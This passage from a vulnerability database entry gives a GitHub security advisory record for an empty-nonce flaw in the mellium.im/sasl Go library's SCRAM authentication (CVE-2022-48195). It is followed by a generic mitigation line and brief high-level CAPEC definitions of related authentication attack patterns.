  "details": "An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.",
  "id": "GHSA-gvfj-fxx3-j323",
  "modified": "2024-05-20T21:43:00Z",
  "published": "2022-12-31T03:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48195"
    },
    {
      "type": "PACKAGE",
      "url": "https://codeberg.org/mellium/sasl"
    },
    {
      "type": "WEB",
      "url": "https://codeberg.org/mellium/sasl/commit/e6cbf681b247c4efa1477eaad2cc47a01707b732"
    },
    {
      "type": "WEB",
      "url": "https://codeberg.org/mellium/sasl/releases/tag/v0.3.1"
    },
    {
      "type": "WEB",
      "url": "https://mellium.im/cve/cve-2022-48195"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2023-1268"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mellium.im/sasl authentication failure due to insufficient nonce randomness"
}

Mitigation
Architecture and Design

Strategy: Libraries or Frameworks

Use an authentication framework or library such as the OWASP ESAPI Authentication feature.

CAPEC-114: Authentication Abuse

An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.

CAPEC-115: Authentication Bypass

An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.

CAPEC-151: Identity Spoofing

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.

CAPEC-194: Fake the Source of Data

An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.

CAPEC-22: Exploiting Trust in Client

An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.

CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data

This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.

CAPEC-593: Session Hijacking

This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.

CAPEC-633: Token Impersonation

An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.

CAPEC-650: Upload a Web Shell to a Web Server

By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.

CAPEC-94: Adversary in the Middle (AiTM)

An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.